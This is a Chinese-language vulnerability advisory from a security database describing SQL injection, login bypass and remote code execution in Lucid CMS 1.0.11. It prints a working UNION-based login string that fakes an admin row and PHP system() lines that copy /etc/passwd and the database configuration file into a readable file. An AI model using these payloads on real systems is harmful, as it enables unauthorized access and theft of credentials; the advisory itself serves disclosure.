首页 -> 安全研究

安全研究

安全漏洞
Lucid CMS 1.0.11 SQL注入/绕过登录/远程执行代码漏洞

发布日期:2005-09-30
更新日期:2005-09-30

受影响系统:
lucidCMS Lucid CMS 1.0.11
描述:
BUGTRAQ  ID: 14976

lucidCMS是一款简单灵活的内容管理系统。

lucidCMS中存在多个输入验证错误:

1) 如果关闭魔术引号的话就会导致SQL注入:

在登录表单中输入以下内容,以管理员登录:

登录:'UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
口令:无                                                          ^
                                                                  |
                                                                  |
                                                               这是哈希
              
                                                              md5('')的结果
注意:登录中没有空格

登录请求变为:

SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE@hotmail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'

2) 现在新的管理员就可以编辑模板、注入恶意javascript代码、查看phpinfo()、管理用户/组、激活/禁用插件。攻击者可以激活renderPHP插件,在主样式表末尾添加以下行:

<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>

查看/etc/passwd文件:

<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>

查看数据库用户名/口令、数据库名称和表格前缀,这样就可以完全控制数据库系统。

<*来源:rgod (rgod@autistici.org
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112803020415743&w=2
*>

建议:
厂商补丁:

lucidCMS
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://lucidcms.net/

浏览次数:2726
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障